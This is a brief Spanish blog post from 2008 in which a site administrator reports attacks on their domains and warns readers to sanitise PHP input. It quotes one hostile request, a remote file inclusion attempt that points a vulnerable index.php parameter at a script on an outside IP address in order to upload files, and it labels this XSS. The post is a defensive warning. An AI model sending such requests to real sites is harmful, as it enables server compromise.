XSS : Ataques spam mediante scripts PHP en una url

Escrito el 02/June/2008 por juan_belon

He recibido más ataques en los dominios de los que soy responsable,…esta vez usando un ataque de esta forma

index.php?com=http://207.234.200.112/css/style/style.txt?contacto

intentan colar un script para subir ficheros…dentro de una variable…

tenedlo en cuenta, parsear bien las entradas! $_GET, $_POST, etc. ;)